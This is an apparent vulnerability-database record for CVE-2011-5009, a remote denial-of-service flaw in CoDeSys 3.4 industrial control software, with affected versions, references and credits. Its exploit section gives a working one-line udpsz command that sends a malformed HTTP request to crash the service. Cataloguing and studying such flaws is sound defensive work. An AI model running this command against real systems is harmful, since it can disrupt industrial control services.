ID

VAR-E-201111-0008


CVE

cve_id:CVE-2011-5009

Trust: 1.9

cve_id:CVE-2011-5007

Trust: 0.3

cve_id:CVE-2011-5008

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36378 // EDBNET: 57722

EDB ID

36378


TITLE

CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service - Multiple dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 36378

DESCRIPTION

CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service. CVE-2011-5009CVE-77389 . dos exploit for Multiple platform

Trust: 0.6

sources: EXPLOIT-DB: 36378

AFFECTED PRODUCTS

vendor:codesysmodel: - scope:eqversion:3.4

Trust: 1.0

vendor:3s smartmodel:codesys sp4 patchscope:eqversion:3.42

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:3.4

Trust: 0.6

vendor:3s smartmodel:codesysscope:eqversion:2.3

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:3.5

Trust: 0.6

vendor:3s smartmodel:codesysscope:neversion:2.3.9.32

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36378

EXPLOIT

source: https://www.securityfocus.com/bid/50854/info

CoDeSys is prone to multiple denial-of-service vulnerabilities.

An attacker can exploit these issues to crash the application and deny service to legitimate users.

udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

Trust: 1.0

sources: EXPLOIT-DB: 36378

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 36378

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 36378

TYPE

Null Pointer Invalid HTTP Request Parsing Remote Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 36378

CREDITS

Luigi Auriemma

Trust: 0.6

sources: EXPLOIT-DB: 36378

EXTERNAL IDS

db:NVDid:CVE-2011-5009

Trust: 1.9

db:BIDid:50854

Trust: 1.9

db:EXPLOIT-DBid:36378

Trust: 1.6

db:ICS CERTid:ICSA-12-006-01

Trust: 0.6

db:EDBNETid:57722

Trust: 0.6

db:NVDid:CVE-2011-5007

Trust: 0.3

db:NVDid:CVE-2011-5008

Trust: 0.3

db:BIDid:50849

Trust: 0.3

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36378 // EDBNET: 57722

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-5009

Trust: 1.6

url:https://www.securityfocus.com/bid/50854/info

Trust: 1.0

url:http://www.3s-software.com/index.shtml?en_codesysv3_en

Trust: 0.6

url:http://aluigi.altervista.org/adv/codesys_1-adv.txt

Trust: 0.6

url:http://www.us-cert.gov/control_systems/pdf/icsa-12-006-01.pdf

Trust: 0.6

url:https://www.exploit-db.com/exploits/36378/

Trust: 0.6

sources: BID: 50854 // BID: 50849 // EXPLOIT-DB: 36378 // EDBNET: 57722

SOURCES

db:BIDid:50854
db:BIDid:50849
db:EXPLOIT-DBid:36378
db:EDBNETid:57722

LAST UPDATE DATE

2022-07-27T09:12:24.915000+00:00


SOURCES UPDATE DATE

db:BIDid:50854date:2012-01-10T20:00:00
db:BIDid:50849date:2012-11-15T23:10:00

SOURCES RELEASE DATE

db:BIDid:50854date:2011-11-30T00:00:00
db:BIDid:50849date:2011-11-29T00:00:00
db:EXPLOIT-DBid:36378date:2011-11-30T00:00:00
db:EDBNETid:57722date:2011-11-30T00:00:00